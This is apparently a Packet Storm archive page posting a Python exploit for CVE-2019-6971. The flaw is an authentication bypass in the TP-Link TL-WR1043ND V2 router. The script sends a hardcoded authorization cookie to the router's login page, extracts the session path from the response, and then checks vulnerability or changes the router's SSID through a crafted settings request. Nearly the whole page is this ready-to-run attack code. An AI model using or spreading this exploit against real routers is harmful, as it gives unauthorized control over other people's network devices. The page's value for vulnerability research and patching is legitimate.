exploit the possibilities

TP-Link TL-WR1043ND 2 Authentication Bypass

TP-Link TL-WR1043ND 2 Authentication Bypass
Posted Oct 10, 2019
Authored by Uriel Kosayev

TP-Link TL-WR1043ND 2 suffers from an authentication bypass vulnerability.

tags | exploit, bypass
MD5 | dfcae729668c5864af9931fc50f06a0e

TP-Link TL-WR1043ND 2 Authentication Bypass

Change Mirror Download
# Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass
# Date: 2019-06-20
# Exploit Author: Uriel Kosayev
# Vendor Homepage: https://www.tp-link.com
# Version: TL-WR1043ND V2
# Tested on: TL-WR1043ND V2
# CVE : CVE-2019-6971
# CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-6971

import requests

ascii = '''
__________ __ _ __
/_ __/ __ \ / / (_)___ / /__
/ / / /_/ /_____/ / / / __ \/ //_/
/ / / ____/_____/ /___/ / / / / ,<
/_/ /_/ /_____/_/_/ /_/_/|_|

'''
print(ascii)
Default_Gateway = raw_input("Enter your TP-Link router IP: ")

# Constants
url = 'http://'
url2 = '/userRpm/LoginRpm.htm?Save=Save'
full = url + Default_Gateway + url2
# full = str(full)

# The full GET request with the cookie authorization hijacked
req_header = {
'Host': '{}'.format(Default_Gateway),
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://{}/userRpm/LoginRpm.htm?Save=Save'.format(Default_Gateway),
'Connection': 'close',
'Cookie': '''Authorization=Basic%20QWRtaW5pc3RyYXRvcjpjM2JiNTI5NjdiNjVjYWY4ZWRkMWNiYjg4ZDcwYzYxMQ%3D%3D''',
'Upgrade-Insecure-Requests': '1'
}

try:
response = requests.get(full, headers=req_header).content
except requests.exceptions.ConnectionError:
print("Enter a valid Default Gateway IP address\nExiting...")
exit()
generate = response.split('/')[3] # Gets the randomized URL "session ID"


option_1 = input("Press 1 to check if your TP-Link router is vulnerable: ")

if option_1 is 1:

if generate in response:
print('Vulnerable!\n')
option_2 = input('Press 2 if you want to change the router\'s SSID or any other key to quit: ')
if option_2 is 2:
newssid = raw_input('New name: ')
ssid_url = '/userRpm/WlanNetworkRpm.htm?ssid1={}&ssid2=TP-LINK_660A_2&ssid3=TP-LINK_660A_3&ssid4=TP-LINK_660A_4&region=43&band=0&mode=5&chanWidth=2&channel=1&rate=83&speedboost=2&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save'.format(
newssid)
changessid_full = url + Default_Gateway + '/' + generate + ssid_url
requests.get(changessid_full, headers=req_header)
print('Changed to: {}'.format(newssid))
else:
("Please choose the correct option.\nExiting...")
exit()
else:
print('Not Vulnerable')
exit()
else:
print("Please choose the correct option.\nExiting...")
exit()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    7 Files
  • 19
    Oct 19th
    1 Files
  • 20
    Oct 20th
    3 Files
  • 21
    Oct 21st
    12 Files
  • 22
    Oct 22nd
    11 Files
  • 23
    Oct 23rd
    18 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close